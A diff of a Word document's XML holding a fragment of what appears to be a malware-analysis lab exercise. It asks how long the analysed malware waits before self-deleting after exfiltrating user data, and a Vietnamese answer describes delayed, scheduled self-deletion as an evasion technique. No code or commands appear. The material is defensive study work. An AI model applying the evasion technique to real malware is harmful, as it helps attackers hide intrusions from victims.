+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>behavior</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>post-data</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>exfiltration</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> can </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>give</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>insights</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>into</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>its</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>evasion</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>techniques</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>By</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>analyzing</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>child</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>processes</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>after</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>successfully</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>exfiltrating</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>user's</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>data</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>how</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>many</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>seconds</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>does</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>it</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>take</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>for</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>malware</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>self-delete</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="46"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Tự xóa thường liên quan đến các lệnh lên lịch để xóa các tệp của phần mềm độc hại và có thể được thực hiện sau một khoảng thời gian trì hoãn để đảm bảo các hoạt động độc hại, chẳng hạn như trích xuất dữ liệu hoặc gửi </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>payload</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>, được hoàn tất đầy đủ.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="103EAB7C" wp14:editId="61107C48">
+            <wp:extent cx="5943600" cy="2740660"/>
+            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
+            <wp:docPr id="1548074436" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1548074436" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId17"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="2740660"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5199,6 +4817,95 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="056761AF"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="0CB84AE6"/>
+    <w:lvl w:ilvl="0" w:tplc="042A000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="042A0019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="042A001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="042A000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="042A0019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="042A001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="042A000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="042A0019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="042A001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="06563BDE"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="2BF8253C"/>
@@ -5287,7 +4994,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="07237419"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="1D268F54"/>
@@ -5376,7 +5083,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="0C33425C"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="84CAB778"/>
@@ -5465,7 +5172,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="0DFE70D0"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="B92408BA"/>
@@ -5554,7 +5261,96 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="0EF50880"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="3B36E8E2"/>
+    <w:lvl w:ilvl="0" w:tplc="042A000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="042A0019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="042A001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="042A000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="042A0019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="042A001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="042A000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="042A0019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="042A001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="0F1370CC"/>
